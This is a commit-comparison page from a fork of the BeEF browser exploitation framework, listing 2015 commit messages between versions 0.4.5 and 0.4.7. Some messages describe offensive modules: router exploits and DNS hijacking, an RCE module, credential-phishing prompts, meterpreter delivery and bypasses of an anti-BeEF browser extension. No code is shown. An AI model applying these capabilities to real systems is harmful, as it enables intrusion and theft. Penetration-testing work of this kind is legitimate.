Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

base: Hiddenden:beef-0.4.5.1
Branches Tags
Hiddenden:master Hiddenden:dependabot/bundler/json-2.19.0 Hiddenden:red/fix_dependabot_automerge Hiddenden:dependabot/bundler/rubocop-1.85.1 Hiddenden:dependabot/bundler/sqlite3-2.9.1 Hiddenden:red/fix_xss_module Hiddenden:red/workflow-security-improvements Hiddenden:red/test_all_modules Hiddenden:red/dev Hiddenden:revert-3226-add_enable_auto_merge Hiddenden:update_copyright Hiddenden:wheatley-patch-2 Hiddenden:revert-2594-revert-2590-master Hiddenden:revert-2590-master
Hiddenden:v0.6.0.0 Hiddenden:v0.5.4.0 Hiddenden:v0.5.2.0 Hiddenden:v0.5.3.0 Hiddenden:v0.5.1.0 Hiddenden:v0.5.0.0 Hiddenden:beef-0.4.7.3 Hiddenden:beef-0.4.7.2 Hiddenden:beef-0.4.7.1 Hiddenden:beef-0.4.7.0 Hiddenden:beef-0.4.6.1 Hiddenden:beef-0.4.5.1 Hiddenden:beef-0.4.5.0 Hiddenden:beef-0.4.4.9 Hiddenden:beef-0.4.4.8 Hiddenden:beef-0.4.4.7 Hiddenden:beef-0.4.4.6.1 Hiddenden:beef-0.4.4.6 Hiddenden:beef-0.4.4.5 Hiddenden:beef-0.4.4.4.1 Hiddenden:beef-0.4.4.4 Hiddenden:beef-0.4.4.3 Hiddenden:beef-0.4.4.2.1 Hiddenden:beef-0.4.4.1 Hiddenden:beef-0.4.4.0 Hiddenden:beef-0.4.3.9 Hiddenden:beef-0.4.3.8 Hiddenden:beef-0.4.3.7 Hiddenden:beef-0.4.3.6 Hiddenden:beef-0.4.3.5 Hiddenden:beef-0.4.3.4 Hiddenden:beef-0.4.3.3 Hiddenden:beef-0.4.3.2 Hiddenden:beef-0.4.3.1
..
compare: Hiddenden:beef-0.4.7.0
Branches Tags
Hiddenden:dependabot/bundler/json-2.19.0 Hiddenden:red/fix_dependabot_automerge Hiddenden:dependabot/bundler/rubocop-1.85.1 Hiddenden:dependabot/bundler/sqlite3-2.9.1 Hiddenden:master Hiddenden:red/fix_xss_module Hiddenden:red/workflow-security-improvements Hiddenden:red/test_all_modules Hiddenden:red/dev Hiddenden:revert-3226-add_enable_auto_merge Hiddenden:update_copyright Hiddenden:wheatley-patch-2 Hiddenden:revert-2594-revert-2590-master Hiddenden:revert-2590-master
Hiddenden:v0.6.0.0 Hiddenden:v0.5.4.0 Hiddenden:v0.5.2.0 Hiddenden:v0.5.3.0 Hiddenden:v0.5.1.0 Hiddenden:v0.5.0.0 Hiddenden:beef-0.4.7.3 Hiddenden:beef-0.4.7.2 Hiddenden:beef-0.4.7.1 Hiddenden:beef-0.4.7.0 Hiddenden:beef-0.4.6.1 Hiddenden:beef-0.4.5.1 Hiddenden:beef-0.4.5.0 Hiddenden:beef-0.4.4.9 Hiddenden:beef-0.4.4.8 Hiddenden:beef-0.4.4.7 Hiddenden:beef-0.4.4.6.1 Hiddenden:beef-0.4.4.6 Hiddenden:beef-0.4.4.5 Hiddenden:beef-0.4.4.4.1 Hiddenden:beef-0.4.4.4 Hiddenden:beef-0.4.4.3 Hiddenden:beef-0.4.4.2.1 Hiddenden:beef-0.4.4.1 Hiddenden:beef-0.4.4.0 Hiddenden:beef-0.4.3.9 Hiddenden:beef-0.4.3.8 Hiddenden:beef-0.4.3.7 Hiddenden:beef-0.4.3.6 Hiddenden:beef-0.4.3.5 Hiddenden:beef-0.4.3.4 Hiddenden:beef-0.4.3.3 Hiddenden:beef-0.4.3.2 Hiddenden:beef-0.4.3.1

290 Commits
beef-0.4.5 ... beef-0.4.7

Author SHA1 Message Date
Brendan Coles
ebbdbe0b51 Update context menu 2015-12-23 11:15:36 +00:00
Brendan Coles
6ba1074695 Prevent duplicates 2015-12-23 11:14:55 +00:00
Brendan Coles
dc9b4d3214 Add method to remove network host 2015-12-19 05:55:36 +00:00
Brendan Coles
d9cb64e1cb successfully 2015-12-19 04:57:50 +00:00
Brendan Coles
dea18f8718 Update Ruby version to 2.2.4 2015-12-19 03:58:47 +00:00
Brendan Coles
5d8393822f Remove Identify LAN Subnets from Network extension 2015-12-19 03:22:01 +00:00
Brendan Coles
976b875639 Update description 2015-12-16 15:55:33 +00:00
Brendan Coles
0f0a4d90b3 Add SunOS detection 2015-12-16 15:15:38 +00:00
Brendan Coles
83a4b532aa print_error 2015-12-15 09:50:14 +00:00
Brendan Coles
db9b3e1f0e Add Get ntop Network Hosts module 2015-12-15 09:11:26 +00:00
Brendan Coles
666f3d0ea3 Add context menu to Rider history panel 2015-12-14 17:55:30 +00:00
Brendan Coles
61a9b94ca1 Add webrtc unit test stub 2015-12-14 17:01:26 +00:00
Brendan Coles
ebd2fa6088 Add console unit test stub 2015-12-14 16:57:31 +00:00
Brendan Coles
11a7d56584 Exit cleanly on console history log mkdir failure 2015-12-14 16:19:40 +00:00
Brendan Coles
7ce85776cc Update butcher demo jQuery to 1.11.3 2015-12-14 15:03:58 +00:00
Brendan Coles
10d79b9a71 Add proto to Requester history and add SSL checkbox to Forge Request 2015-12-14 12:43:39 +00:00
Brendan Coles
95abdf6781 Add 'proto' property to Requester HTTP model 2015-12-14 12:40:34 +00:00
Brendan Coles
e354ab8045 Add support for request.proto to beef.net.forge_request 2015-12-14 12:38:41 +00:00
Brendan Coles
49f648c0c7 Add Disable Developer Tools module 2015-12-13 22:01:43 +00:00
Brendan Coles
0226a91048 Add Get Network Connection Type module 2015-12-13 21:49:21 +00:00
Brendan Coles
cb4df3a72c Validate beef.net.connection.type value 2015-12-13 21:43:29 +00:00
Brendan Coles
06e9c6024b Add ignore_public_ips option to Network extension 2015-12-13 09:26:55 +00:00
Brendan Coles
852e0b4595 Add Discover Proxies option to Network extension UI 2015-12-13 09:25:34 +00:00
Brendan Coles
5738e08ba0 Rename and update asus_rt_series_get_info 2015-12-13 07:08:09 +00:00
Brendan Coles
575bbd6560 Update clipboard theft module 2015-12-13 06:54:48 +00:00
Brendan Coles
ea8d331b47 Add BeEF::Filters.is_valid_private_ip() 2015-12-13 06:51:40 +00:00
Brendan Coles
28cd84c558 Add ARE status to module response 2015-12-12 19:08:09 +00:00
Brendan Coles
9dd468d10f Default to 'ALL' for browser, browser_version, os, os_version if unspecified 2015-12-12 18:49:02 +00:00
Brendan Coles
09b2dd9151 Add ntop signature 2015-12-12 18:46:07 +00:00
Brendan Coles
951e694251 Fix Skype XSS module class name 2015-12-12 18:45:14 +00:00
antisnatchor
f6e96937d3 Merge pull request #1160 from hiburn8/master 
added a WP module
 2015-12-10 15:19:07 +01:00
antisnatchor
1758383bc4 Merge pull request #1179 from atilaromero/patch-1 
Fix "ALL" comparison for browser and os
 2015-12-10 15:17:52 +01:00
antisnatchor
00e97cc3dc Merge pull request #1185 from beefproject/SkypeXSS 
Skype xss
 2015-12-10 15:15:17 +01:00
antisnatchor
e4afd12a9b Fixed Flash detection on IE11, thanks @badbob as this was originally part of his pull request which I haven't merged earlier ;-) 2015-12-10 15:00:02 +01:00
Brendan Coles
2999142247 Add support for Firefox 43 2015-12-10 13:05:16 +00:00
antisnatchor
d585f3ab24 Added RESTful API call to update os/os_version/arch of a specific browser (useful in MITM scenarios where you have more powerful tools than browser/JS to fingerprint) 2015-12-02 14:35:55 +01:00
antisnatchor
7b1b3ef06c Moved PhishingFrenzy integration code check before ARE/network 2015-12-02 14:35:08 +01:00
antisnatchor
0c68b3235f Added support for Chrome 47 2015-12-02 14:03:10 +01:00
Brendan Coles
f893808003 raise InvalidParamError 2015-11-28 09:14:44 +00:00
Brendan Coles
21176eb9ac Add status bar messages for WebRTC 2015-11-28 05:51:41 +00:00
Brendan Coles
b8b99ed044 Fix status bar 2015-11-28 01:47:13 +00:00
Christian Frichot
27c7e76554 Updated WebRTC extension with AdminUI enhancements and arbitrary command module execution 2015-11-27 11:00:35 -08:00
Brendan Coles
78a30bde15 Add support for Firefox 42 2015-11-03 21:51:03 +00:00
antisnatchor
d017bdc585 is_valid_hostname now accepts also FQDNs with double dash or dot (although technically wrong as per RFC, some registrants allow them). 2015-10-25 15:06:55 +01:00
antisnatchor
5dbfe37480 Added support for Chrome 46 2015-10-25 14:50:19 +01:00
Atila Romero
09ff1f5f0a Update engine.rb 2015-10-23 16:50:13 -02:00
Brendan Coles
98a3ae930b Add NetworkHost :lastseen to console 2015-10-11 10:42:55 +00:00
Brendan Coles
6d2cf5efe2 Add Get Proxy Servers (WPAD) module 2015-10-11 10:29:34 +00:00
Brendan Coles
4c62d4af58 Remove hackvertor 2015-10-11 10:24:50 +00:00
Brendan Coles
ea039379ff Merge pull request #1150 from innoying/patch-1 
Add IPv6 Support to get_internal_ip_webrtc command
 2015-10-11 20:54:09 +11:00
Atila Romero
8626b1b275 Fix "ALL" comparison for browser and os 
The correct is to check if the *rule.browser* has the tag "ALL", not if the browser was identified as "ALL", which of course never happen.
Before this fix, using "ALL" in a ARE rule makes it be never called.
 2015-10-06 11:01:30 -03:00
antisnatchor
277c87db5b Merge pull request #1177 from bcoles/vis.js 
Add vis.js to Admin UI
 2015-10-05 13:53:17 +02:00
antisnatchor
5d2bdf4f39 Merge pull request #1178 from bcoles/network_map 
Network Map
 2015-10-05 13:52:48 +02:00
Brendan Coles
a3a802a390 Add Network Map tab to Admin UI 2015-10-04 09:14:31 +00:00
Brendan Coles
68e422517a Add Network Map assets 2015-10-04 09:13:17 +00:00
Brendan Coles
493622bdcc Add vis.js to Admin UI 2015-10-04 08:37:26 +00:00
Brendan Coles
cfc39edb54 return 2015-10-04 08:35:53 +00:00
Brendan Coles
9386fa28e7 Add beef.net.connection client methods 2015-10-03 14:27:27 +00:00
Brendan Coles
6a2d3fa223 Check browser plugins in beef.browser.hasJava() 2015-10-03 13:19:33 +00:00
Brendan Coles
14c235b44b Merge pull request #1170 from Compewter/master 
Add logic for beef.browser.javaEnabled function
 2015-10-03 23:02:51 +10:00
Brendan Coles
1626e801c2 Add :lastseen property to NetworkHost model 2015-10-02 00:13:08 +00:00
Brendan Coles
5f5181f51b Add Detect Burp module 2015-10-01 07:57:27 +00:00
Brendan Coles
ed321bf5ec Remove :cid property from Network extension data models 2015-09-30 07:20:29 +00:00
Brendan Coles
cc3b10b889 Add support for Firefox 41 2015-09-30 06:59:34 +00:00
Brendan Coles
48493812d5 Add support for Chrome for iOS versions 43, 44, 45 2015-09-30 04:58:04 +00:00
Brendan Coles
f685f4a0a9 Add support for Chrome 45 2015-09-30 01:10:21 +00:00
Brendan Coles
31361a3191 Merge pull request #1175 from xxbinxx/master 
URL performance enhanced with user content security
 2015-09-30 09:07:35 +10:00
Brendan Coles
00afced5f1 Use opts[:ssl_version] 2015-09-29 06:27:45 +00:00
Bineet kumar gaur
a2564a504e URL replaced 2015-09-29 10:45:43 +05:30
Bineet kumar gaur
f23a384ead faster URL load... no delay 2015-09-29 10:44:36 +05:30
Bineet kumar gaur
696fd5c7c1 No https redirection... direct hit url with curl 2015-09-29 10:41:30 +05:30
Bineet kumar gaur
70f787ee57 URL changed to faster load 2015-09-29 10:40:15 +05:30
Brendan Coles
6e229a28cf Merge pull request #1141 from qswain2/IOS-pretty-theft 
IOS pretty theft
 2015-09-29 12:55:03 +10:00
Brendan Coles
cd55779d35 Merge pull request #1172 from n00py/master 
Add Linksys E2500 router exploits
 2015-09-16 23:58:52 +10:00
n00py
4852f0d861 linksyse2500 2015-09-16 01:57:23 -07:00
Michael Wetherald
2eae689bf1 Add logic for beef.browser.javaEnabled function 2015-09-13 22:28:51 -07:00
Brendan Coles
f17ea36ca3 Rescue DNS server port unavailable - Fix #1166 2015-09-13 16:24:18 +00:00
Brendan Coles
fe8aacecf4 Add Ipec unit test stub - Fix #586 2015-09-09 18:51:40 +00:00
Brendan Coles
3ef47151b5 Add XssRays unit test stub - Fix #578 2015-09-09 18:50:50 +00:00
Brendan Coles
091841fc1a Add QRcode extension unit test stub 2015-09-09 18:47:11 +00:00
Brendan Coles
9a0a36176f Add Proxy unit tests - Fix #30 2015-09-09 07:41:56 +00:00
Brendan Coles
44c5c73f97 Add Requester unit tests - Fix #29 2015-09-09 07:40:36 +00:00
Brendan Coles
ae1fa3e958 Rescue missing SSL cert/key files 2015-09-09 07:36:45 +00:00
Brendan Coles
07f61ff5f0 Add 'Target URI' module option 2015-09-01 14:02:19 +00:00
Brendan Coles
20fff8283f Merge pull request #1162 from byt3bl33d3r/master 
added extensions/admin_ui/media/javascript-min/ to .gitignore
 2015-09-01 22:53:10 +10:00
byt3bl33d3r
301d3a88a5 added extensions/admin_ui/media/javascript-min/ to .gitignore 2015-09-01 14:43:12 +02:00
Daniel Reece
99367bb619 added a WP module 2015-08-31 23:49:32 +01:00
Brendan Coles
1eb1be2adf Merge pull request #1156 from bcoles/blockui 
Add jQuery BlockUI plugin to hook
 2015-08-25 22:44:18 +10:00
Brendan Coles
4391a856ac Replace eval with compare_versions 2015-08-22 19:46:07 +00:00
Brendan Coles
02ff6a9313 var 2015-08-22 19:41:28 +00:00
Brendan Coles
f1d1e0f176 Update gem rest-client to ~> 1.8.0 2015-08-22 18:06:25 +00:00
Brendan Coles
cfd1584d0c Add autopwn URL validation 2015-08-22 18:03:10 +00:00
Brendan Coles
2b19c2dd13 Add Proxy integration tests - Fix #30 2015-08-22 10:56:13 +00:00
Brendan Coles
8f683e6d0f Add Proxy REST /api/proxy/setTargetZombie 2015-08-22 10:47:04 +00:00
Brendan Coles
b89ca6baa3 Add jQuery BlockUI plugin to hook 2015-08-18 13:47:09 +00:00
Brendan Coles
bbeeabdffe Add bundle-audit Rake tasks 
Thanks @cwest !

Source: http://caseywest.com/run-bundle-audit-from-rake/
 2015-08-18 04:35:32 +00:00
Brendan Coles
fbdbfd4896 Use HTTPS for rubygems.org source 2015-08-18 03:27:27 +00:00
Brendan Coles
e06198c320 Use ignore_headers in proxy 2015-08-16 11:29:30 +00:00
Brendan Coles
cf2f1093a7 Add support for Firefox 40 2015-08-15 06:59:15 +00:00
Brendan Coles
e22c5ea7e2 Use beef.debug in deployJava.js 2015-08-04 14:58:34 +00:00
antisnatchor
050cc3edfd Fixed #1151 2015-07-30 10:46:12 +02:00
Luke Young
bbcf3776ce Add IPv6 Support to get_internal_ip_webrtc command 
This update adds support for IPv6 to the RTCPeerConnection revealing internal IPv6 addresses as well.
 2015-07-29 13:24:58 -07:00
antisnatchor
d34f97c4cb Fixed #1147 (introduced with one of the latest commits :-) 2015-07-29 16:19:07 +02:00
antisnatchor
605a71d38a cutting string with [start..end] rather than split() for more accurate parsing. 2015-07-29 11:13:03 +02:00
antisnatchor
520d62a3f9 Reduced browser/os_version max length to 15 chars. 2015-07-29 10:59:27 +02:00
antisnatchor
39d85d4b53 Added TODO for better cpu detection on != Win 2015-07-29 10:41:02 +02:00
antisnatchor
568f63f13d Refactored the cpu detection JS code. Now starts to detect if the target is 64 bit, then moves to the other checks. 2015-07-29 10:25:32 +02:00
antisnatchor
157fd4104b Added code comments about eval usage :-) 2015-07-28 14:12:27 +02:00
antisnatchor
4d0f1981c2 Added RESTful API calls to delete and list rulesets. 2015-07-28 11:41:46 +02:00
antisnatchor
b81f7c6953 Small changes in some rulesets, fixed old code comments. 2015-07-28 10:29:50 +02:00
antisnatchor
031f587421 Removed fixed TODOs 2015-07-27 16:38:03 +02:00
antisnatchor
4334dd1e54 Using same variable convention for consistency 2015-07-27 15:49:12 +02:00
antisnatchor
6f5b025acc Added more restrictions on browser/os version definitions 2015-07-27 14:02:20 +02:00
antisnatchor
e3a20adeb0 Re-added config object 2015-07-27 13:29:47 +02:00
antisnatchor
b7788d6fe5 Cleaned rules. 2015-07-27 12:31:37 +02:00
antisnatchor
3c80da5776 Added support for Chrome 44 2015-07-27 12:21:44 +02:00
antisnatchor
a2d4def983 Added readme for ARE enabled rules folder, removed jools test stuff 2015-07-27 10:45:35 +02:00
antisnatchor
bdecbd21a0 Merged changed from master branch, disabled ARE rules by default. 2015-07-27 10:44:51 +02:00
antisnatchor
c84e1b88ac Autorun Rule Engine from @antisnatchor with love (alpha version). 2015-07-27 10:34:58 +02:00
Brendan Coles
fa2f175400 Replace 'console.log' with 'beef.debug' 2015-07-24 07:50:53 +00:00
qswain2
fb19af6705 Fix 404 for linkedin logo in pretty theft 2015-07-20 20:25:59 -04:00
qswain2
46b632e316 Add IOS option to pretty theft 
Adds option to display a prompt styled like
an IOS application. Port of POC example used
by jansoucek's IOS Mail injection POC
 2015-07-20 19:39:19 -04:00
Brendan Coles
1f00c396c6 Replace console.log with beef.debug 2015-07-19 10:36:59 +00:00
Brendan Coles
799e5d9626 Use local dropper URL 2015-07-19 10:32:04 +00:00
antisnatchor
7cb94386fe Merge branch 'dns-rebinding' 
Merging pull request #1105, including some bug fix.
 2015-07-19 11:28:47 +02:00
antisnatchor
51cc5963fa Replaced system with IO.popen to prevent an unlikely RCE, and also added additional checks. 2015-07-19 11:24:53 +02:00
Michele Orru
dfd2baafcd Merge pull request #1124 from auraltension/master 
Config file should not be relevant to beef install dir
 2015-07-19 10:48:53 +02:00
Michele Orru
6c10377112 Merge pull request #1132 from byt3bl33d3r/master 
Added .ruby-gemset and .ruby-version for rvm
 2015-07-19 10:47:45 +02:00
Michele Orru
f617422be2 Merge pull request #1140 from redknight99/patch-1 
Update Install.txt
 2015-07-19 10:46:24 +02:00
redknight99
56a013b06f Update Install.txt 
1. Updated the "therubyracer for windows" link. The current one was 404. 

2. Added an instruction about changing the dependencies. Without changing the dependencies bundle install will attempt to install an incompatible version of therubyracer .
 2015-07-18 15:58:47 -07:00
Brendan Coles
13428e6ff7 Host clippy images locally 2015-07-18 06:48:10 +00:00
Wade Alcorn
d3e1d5b506 Updated version to 0.4.6.1-alpha 2015-07-13 11:43:05 +10:00
Wade Alcorn
5d302cd74c Updated version to 0.4.6.1-alpha 2015-07-13 09:40:54 +10:00
Brendan Coles
aaefde9b43 Replace console.log with beef.debug 2015-07-12 22:51:06 +00:00
Brendan Coles
bcd2dd1b32 Remove duplicate gem 2015-07-11 15:30:43 +00:00
Brendan Coles
7f29e676b3 Use public URL 2015-07-10 22:36:14 +00:00
Brendan Coles
cbfe472eb7 Merge pull request #1125 from ReliaQuest-Labs/master 
Fixed hta_powershell module so that it can establish a meterpreter session.
 2015-07-11 08:09:12 +10:00
Brendan Coles
326e9536d6 Remove unused test cases 2015-07-08 08:33:00 +00:00
Brendan Coles
a1f0eb90c5 CamelCase for consistency 2015-07-08 08:28:29 +00:00
Christian Frichot
13593990e5 WebRTC extension FF fix 
Thanks to updates in modern FFs handling of WebRTC
the webrtcadapter wrapper had to be updated.
To ensure this would be picked up, also added
WebRTC REST integration test cases.
The tests only run if the extension is enabled,
which is still OFF by default.

See Issue #1134 and #1083
 2015-07-08 15:13:21 +08:00
Brendan Coles
526cd42170 Add software fingerprints 2015-07-07 15:09:10 +00:00
Brendan Coles
d737bb19c2 save results 2015-07-07 14:51:04 +00:00
Brendan Coles
83e8bf5186 Add Detect Airdrone module 2015-07-07 13:20:59 +00:00
byt3bl33d3r
13fb6d58b4 Added .ruby-gemset and .ruby-version for rvm 2015-07-06 00:16:27 +02:00
antisnatchor
61af18858e Removed Silverlight detection from default hook. Use DetectSilverlight module instead. This fixes a UI alert to the user if the plugin is outdated. 2015-07-05 16:12:15 +02:00
antisnatchor
ea9549adbe Fixed issue with latest Rack. Now using mime/types to return the right content-type based on file extension when using AssetHandler.bind. 2015-07-05 12:44:00 +02:00
Brendan Coles
c9fac43b2d Add 'msf.token_generate()' for Metasploit 'auth.token_generate' MSGRPC call 
Augment 'msf.login()' to generate and use a permanent authentication token
with 'msf.token_generate()' to prevent authentication failures caused by
timeout of temporary tokens.

The default value for Msf::RPC::Service#token_timeout is 300 seconds.
All temporary tokens expire after [token_timeout] seconds of inactivity.
 2015-07-02 13:07:47 +00:00
antisnatchor
f891d963d7 2nd Bypass for Vegan anti-BeEF Chrome extension (v. 1.2) 2015-07-01 12:30:47 +02:00
Brendan Coles
6f56f00a18 set --read-timeout=60 --tries=3 for wget 2015-06-29 20:08:04 +00:00
Brendan Coles
968ed12849 Fix wget verify_ssl 2015-06-29 19:58:01 +00:00
Brendan Coles
06bbfe9c3b Add BeEF::Filters.is_valid_port 2015-06-29 19:31:35 +00:00
antisnatchor
c387778959 Merge branch 'master' of https://github.com/beefproject/beef 2015-06-29 18:15:43 +02:00
antisnatchor
d9012d0f15 Check for ; and = characters when setting cookies 2015-06-29 12:00:03 +02:00
Brendan Coles
0d3c123e26 Use NetworkService.add and NetworkHost.add 2015-06-28 17:30:14 +00:00
Brendan Coles
d05397e0a9 Add NetworkService.add and NetworkHost.add 2015-06-28 17:22:16 +00:00
Brendan Coles
12d64d1165 Return unique results sorted by id 2015-06-28 08:56:13 +00:00
Brendan Coles
916828e131 Add 'verify_ssl' option to social engineering config 2015-06-28 08:53:23 +00:00
Brendan Coles
694ec61a02 Add TC_Modules test_safe_client_debug_log 2015-06-27 18:57:47 +00:00
Brendan Coles
8b4ad51899 Replace console.log with beef.debug 2015-06-27 18:56:06 +00:00
Brendan Coles
1f40987355 Use RSpec::Matchers in TC_Login 2015-06-27 18:10:56 +00:00
Brendan Coles
c9c9bfa6ee Decrease BeefTest.login sleep to 10 seconds 2015-06-27 17:51:54 +00:00
Brendan Coles
96dcba967b Update eventmachine from 1.0.3 to 1.0.7 in Gemfile.lock 
Required by Ruby 2.2
 2015-06-27 17:48:25 +00:00
Brendan Coles
7b234c9b98 Add rspec to Gemfile 2015-06-27 17:40:43 +00:00
antisnatchor
de13116182 fixed indentdation 2015-06-26 12:15:47 +02:00
antisnatchor
5de857f710 Merge branch 'master' of https://github.com/beefproject/beef 2015-06-26 12:08:53 +02:00
antisnatchor
4413cde187 Bypass for the 'Vegan' anti-BeEF Chrome extension. 2015-06-26 12:05:13 +02:00
Brendan Coles
a98ca1ff98 Add test_port_scanner_results test case 2015-06-25 12:54:52 +00:00
Brendan Coles
423b66f424 Close unused Capybara sessions 2015-06-24 22:16:35 +00:00
Brendan Coles
1aaf529fdd Add TC_NetworkRest test cases 2015-06-24 07:35:20 +00:00
Christian Frichot
f24dd22b05 SocEng RESTful API test case fix 
The test_1_dns_spoof test will now work on OSX/nix by
using dig +short to get the A record instead of using
a large regex. In addition, the test will not iterate
over ALL local non-loopback IPs for a match.

See Issue #1083
 2015-06-23 16:47:19 +08:00
Christian Frichot
ba990e2869 beef.net.request JS method now fires callbacks ALWAYS - not just on successful requests. Fixes Issue #1127 2015-06-23 16:21:58 +08:00
Brendan Coles
68c1f87c42 set VICTIM_DOMAIN to localhost for tests 
The VICTIM_DOMAIN and ATTACK_DOMAIN must be different.

The VICTIM_DOMAIN was 127.0.0.2 however Mac OSX does
not support 127.0.0.x unless aliased. Using 'localhost'
resolves this issue.
 2015-06-23 07:30:57 +00:00
Brendan Coles
a5c2ca8441 Merge branch 'master' of https://github.com/beefproject/beef 2015-06-23 07:29:13 +00:00
Christian Frichot
f51571d8b3 Updated base core filter to handle undefined/illegal/invalid UTF8 byte sequences. See Issue #1126 2015-06-23 09:13:30 +08:00
Brendan Coles
b7fd36aeaa Add signatures 2015-06-22 15:58:26 +00:00
Brendan Coles
83f88ad401 Replace 'rest_client' with 'rest-client' 2015-06-22 15:15:48 +00:00
Brendan Coles
e31f0b8c44 use localhost for integration tests 2015-06-22 15:11:21 +00:00
Brendan Coles
16622b13a5 Add clone_page REST example 2015-06-22 09:45:43 +00:00
Brendan Coles
e7bc352db2 halt 500 if page cloning is unsuccessful 2015-06-22 09:42:10 +00:00
Brendan Coles
e17a48fae2 rescue TypeError, ArgumentError 2015-06-22 09:35:31 +00:00
Brendan Coles
b646535be3 Add TC_DynamicReconstruction test cases 2015-06-22 09:33:06 +00:00
Brendan Coles
a35f42da5b Add TC_DynamicReconstruction.suite 2015-06-22 09:10:07 +00:00
Brendan Coles
e66183a3ba rescue Errno::ENOENT 2015-06-22 07:46:51 +00:00
Brendan Coles
3bec9b2702 Add support for Firefox 39 2015-06-22 06:14:33 +00:00
Brendan Coles
c729408d4b Capitalize login test case for consistency 2015-06-22 05:23:07 +00:00
Brendan Coles
f228f256de Remove unused test cases 2015-06-22 05:20:07 +00:00
Brendan Coles
3fa857525e Add '/api/seng/clone_page' example 2015-06-13 02:18:26 +00:00
Brendan Coles
11291e9577 Use public host and port for web cloner. Fix #1121 2015-06-13 02:15:38 +00:00
Wade Alcorn
23533746a4 Updated readme files to include bug reporting methods 2015-06-13 11:50:55 +10:00
Jonathan Echavarria
8f46ed8c26 Merge pull request #1 from ReliaQuest-Labs/hta_patch 
Fixed hta_powershell module so that it can establish a meterpreter session.
 2015-06-12 15:40:56 -04:00
Jonathan Echavarria
a826b89480 removed comments 2015-06-12 19:15:43 +00:00
Jonathan Echavarria
6bdf829126 updated hta_powershell to use updated powersploit so it can properly create sessions 2015-06-12 19:07:02 +00:00
antisnatchor
c75b7a633d Merge branch 'master' of https://github.com/beefproject/beef 2015-06-11 09:59:38 +02:00
antisnatchor
e5407af2a0 Added support for Chrome 43. Added window.fetch detection for better fingerprinting of C42/43. 2015-06-11 09:59:23 +02:00
Brendan Coles
83fa1efe0d Add '/api/server/bind' example 2015-06-09 19:17:19 +00:00
antisnatchor
03ecd61781 Limited /api/server/bind scope to the social_engineering/droppers directory (it could potentially be abused to mount arbitrary files post-auth) 2015-06-09 12:41:50 +02:00
antisnatchor
518fb5d874 Fixed bug in binding local files. 2015-06-09 12:20:20 +02:00
antisnatchor
f66a08f072 Fixed bug in serving static files from the demos directory. 2015-06-09 11:39:07 +02:00
auraltension
375e1a9adf Config file shoudl not be relevant to beef install dir 2015-06-06 16:41:09 +10:00
Brendan Coles
4746829153 Show UI URLs only when Admin UI is enabled 2015-05-17 22:10:09 +00:00
Brendan Coles
d0c48ce026 Add support for Chrome 42 2015-05-17 22:06:59 +00:00
Brendan Coles
e21c8286c5 Add support for Firefox 38 2015-05-17 21:56:16 +00:00
Brendan Coles
87476c5217 QR - Create images directory if does not exist 2015-05-15 03:07:14 +00:00
Brendan Coles
ad87ea7a56 replace backticks with IO.open 2015-05-14 07:43:53 +10:00
Brendan Coles
dad3be1b91 replace backticks with IO.open 2015-05-14 07:14:35 +10:00
Brendan Coles
0261c1d56f Merge pull request #1118 from bcoles/csrf_to_beef 
Update csrf_to_beef tool
 2015-05-13 03:09:07 +10:00
Brendan Coles
0cc9f53aae Use qr4r gem to generate QR codes 2015-05-12 17:07:58 +00:00
Brendan Coles
aee7aed755 Add Network extension test case stub 2015-05-11 21:52:13 +00:00
Brendan Coles
152ddc5118 csrf_to_beef tool now accepts --url URL as input 2015-05-11 17:58:44 +00:00
Brendan Coles
2220b95b49 Use NAT address - Fix #1116 
Thanks @danilo-massa
 2015-05-09 18:33:28 +00:00
radoen
4db4354c24 Fixed JSON parsing error to prevent DoS 2015-05-04 09:42:09 +02:00
Brendan Coles
0657a3f1f9 Add support for Firefox 37 2015-04-06 04:37:06 +00:00
Michele Orru
03f6b29506 Merge pull request #1104 from malerisch/master 
Kemp Load Master RCE - BeEF module
 2015-04-04 11:58:24 +02:00
timcess
63efe9f523 Update README.md 2015-04-03 01:47:12 +05:00
timcess
bdd1f7894a Add DNS Rebinding module and extension 2015-04-03 02:31:02 +06:00
timcess
2247bf6208 Add DNS Rebinding module and extension 2015-04-03 02:30:16 +06:00
timcess
eaa1400f75 Add DNS Rebinding module and extension 2015-04-03 01:04:35 +06:00
Roberto Suggi Liverani
4c7aa8f677 Kemp Load Master RCE - BeEF module 
This is a new module for BeEF to exploit a RCE vulnerability in Kemp
Load Master load balancer. More information on this blog post:
http://blog.malerisch.net/2015/04/playing-with-kemp-load-master.html
 2015-04-01 22:14:35 +02:00
Michele Orru
f973b8dc3e Merge pull request #1103 from tsu-iscd/master 
Add first modules for BigIP systems
 2015-04-01 10:35:11 +02:00
Denis Kolegov
bff02aaea5 Add first modules for ADC systems 2015-03-31 04:33:10 -04:00
bmantra
86f99d5a51 Merge pull request #1102 from bmantra/master 
add iNotes modules for sending mails with attachments and a flooder
 2015-03-28 20:48:17 +01:00
bmantra
46113db2b8 add iNotes modules for sending mails with attachments and a flooder 2015-03-28 20:47:21 +01:00
Brendan Coles
791c9d1461 Add support for Chrome 41 2015-03-27 02:12:11 +00:00
antisnatchor
32434075f8 Removed loading of deleted file.rb after Rack update. 2015-03-25 10:54:37 +01:00
antisnatchor
6fcca972c8 Removed patched Rack::File after upgrading to Rack 1.6.0. 2015-03-25 10:52:47 +01:00
antisnatchor
90bfca16c6 Removed fixed versions of eventmachine/sinatra/rack from Gemfile 2015-03-25 10:32:46 +01:00
antisnatchor
4126a5530e Fixed bug in forge_request that was not adding the POST body to forged requests. 2015-03-21 12:20:07 +01:00
antisnatchor
1e06bb6c17 Return 'n/a' rather than nil in restful API calls for PF integration 2015-02-27 11:50:38 +01:00
Brendan Coles
75312e4c99 Add support for Firefox 36 2015-02-24 20:06:05 +00:00
Brendan Coles
3b46bf1a94 Add Telstra ZTE MF91 Disable AP Isolation module 2015-02-22 07:51:42 +00:00
Brendan Coles
d863bb8f96 Add Telstra ZTE MF91 Change SSID module 2015-02-22 07:51:04 +00:00
Brendan Coles
c46cd03de8 Add Telstra ZTE MF91 Change Password module 2015-02-22 07:35:56 +00:00
Brendan Coles
abaa6a745d Add D-Link DSL-2640B DNS Hijack module 2015-02-21 10:11:20 +00:00
Brendan Coles
b0526362ad Add target network hosts and services to console 2015-02-21 08:37:00 +00:00
antisnatchor
9d7d0a1071 Merge branch 'master' of https://github.com/beefproject/beef 2015-02-17 12:19:39 +01:00
antisnatchor
